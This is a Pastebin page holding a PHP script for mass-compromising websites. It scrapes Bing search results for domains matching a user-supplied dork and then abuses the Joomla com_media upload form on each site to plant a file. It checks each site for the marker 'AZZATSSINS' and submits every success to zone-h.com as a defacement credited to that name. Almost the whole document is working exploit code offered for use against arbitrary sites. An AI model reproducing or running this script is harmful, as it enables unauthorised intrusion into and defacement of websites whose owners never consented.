Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- $zh = "AZZATSSINS";
- function getsource($url,$post=null) {
- $ch = curl_init($url);
- if($post != null) {
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- }
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION, true);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
- return curl_exec($ch);
- curl_close($ch);
- }
- echo "\nDork Bing: ";$dork=trim(fgets(STDIN,1024));
- $do=urlencode($dork);
- $npage = 1;
- $npages = 30000;
- $allLinks = array();
- $lll = array();
- while($npage <= $npages) {
- $x = getsource("http://www.bing.com/search?q=".$do."&first=" . $npage."&FORM=PERE4");
- if ($x) {
- preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
- foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
- $npage = $npage + 10;
- if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
- } else break;
- }
- $URLs = array();
- foreach($allLinks as $url){
- $exp = explode("/", $url);
- $URLs[] = $exp[2];
- }
- $array = array_filter($URLs);
- $array = array_unique($array);
- $sss=count(array_unique($array));
- echo"\nReady to fuck ". $sss." site";
- foreach ($array as $domain) {
- $_SESSION[$domain] = "1";
- // set var all site + path to x
- $domain1 = "http://$domain"; // URL TARGET
- $domain_exploit = $domain1."/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="; // URL to Exploit
- $target = $domain_exploit;
- $azzatssins = "azx.txt";
- $pwnz= "$domain1/images/$azzatssins";
- $ch4 = curl_init ($target);
- curl_setopt ($ch4, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch4, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch4, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch4, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch4, CURLOPT_COOKIEFILE,'coker_log');
- $data = curl_exec ($ch4);
- curl_close($ch4);
- preg_match("/<form action=\"(.*?)\" id=\"uploadForm\"/", $data, $action);
- preg_match("/name=\"return-url\" value=\"(.*?)\"/", $data, $return);
- $action = $action[1];
- echo "$action\n";
- echo "$return[1]\n";
- $post = array("Filedata[]" => "@$file",
- "return-url" => "$return[1]",
- );
- $ch2 = curl_init ("$action");
- curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch2, CURLOPT_POST, 1);
- curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
- $data2 = curl_exec ($ch2);
- curl_close($ch2);
- $a = file_get_contents($pwnz);
- if(preg_match("/AZZATSSINS/i", $a)){
- echo "Exploit success => $domain1\nUrl : $pwnz\n";
- echo "[+] zone-h: ";
- $ch3 = curl_init ("http://www.zone-h.com/notify/single");
- curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch3, CURLOPT_POST, 1);
- curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$pwnz&hackmode=1&reason=1");
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
- echo " OK - notified by $zh \n";}
- else{
- echo " Error \n";
- }
- }
- else{
- echo "Exploit failed\n\n";
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
